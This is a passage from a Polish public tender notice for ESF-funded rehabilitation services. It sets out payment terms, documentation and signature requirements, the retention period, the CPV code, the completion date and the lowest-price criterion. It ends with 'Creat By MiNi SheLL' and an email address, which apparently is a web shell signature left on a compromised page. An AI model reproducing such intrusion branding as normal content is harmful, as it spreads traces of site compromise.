4. Termin płatności: co miesiąc, 14 dni od dnia przedstawienia rachunku/faktury za wykonane zabiegi, wystawionego/ej po podpisaniu Protokołu Odbioru Usługi. Wykonawca przekaże Zamawiającemu oryginały dokumentów potwierdzających wykonanie usług, celem prawidłowego rozliczenia wykonania zadania, w terminie maksymalnie 7 dni od zakończenia wykonywania usług. Nie ma możliwości wypłacania zaliczek.
5. Wynagrodzenie wypłacane będzie tylko za wykonaną rehabilitację, co musi być potwierdzone podpisami osób z niej korzystających, a w przypadku osób niepełnoletnich, podpisem opiekuna.
6.   Wykonawca przekaże Zamawiającemu po zakończeniu rehabilitacji Indywidualne Karty Odbioru Usług, w których oznaczone będą rodzaje zabiegów wykonanych dla każdego z uczestników oraz  Opinię zawierającą opis stanu na początku i na koniec zabiegów oraz wskazanie czy rehabilitacja jest zakończona czy należy ją w dalszym ciągu kontynuować.
7.Wykonawca musi umożliwić  wyeksponowanie informacji o współfinansowaniu rehabilitacji ze środków EFS w miejscu i czasie prowadzenia rehabilitacji  oraz umieszczenie odpowiednich logotypów, dostarczonych przez Zamawiającego na dokumentacji dotyczącej osób uczestniczących w rehabilitacji projektu.
8.Wykonawca  zobowiązany jest do przechowywania dokumentów do dnia 31.12.2020r. 
9. Zamawiający zastrzega sobie prawo prowadzenia bieżącego nadzoru nad procesem rehabilitacji uczestnika, na każdym jego etapie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com